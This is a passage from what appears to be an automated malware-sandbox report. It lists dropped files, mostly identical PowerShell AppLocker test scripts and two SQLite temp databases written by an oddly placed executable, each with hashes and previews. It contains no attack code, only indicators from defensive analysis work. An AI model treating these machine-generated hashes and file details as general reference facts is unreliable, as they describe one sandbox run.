                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\UdHECWlHFq

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.5712781801655107
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\Wsj6fACaid

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):40960
                                                                                        Entropy (8bit):0.8553638852307782
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dyc3hnl.shs.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0geaqlot.qwr.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0kyl2tbi.bko.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0rggzeja.r0i.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wsyadgi.vq0.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1bl0l0lg.kvo.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1q55yyjk.q0j.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21fu1rdh.hl0.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dlu0pjx.es4.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fd5bqtu.s2h.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uxwp32y.akj.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ewozpun.41o.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qt2botm.yvr.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2c43umi.gfk.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agofry4b.ua4.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahqnfuz0.ywk.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajmdcen1.vdi.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awfdfsf4.3jt.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b5q4vff5.04v.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmh3d52p.exs.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3jte1ng.3va.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5iwh2iz.rwc.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cwwuew0x.aeg.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwjyrteg.cu0.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxzlyefm.1zr.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecrdvjre.m2l.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epjoozdm.pel.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
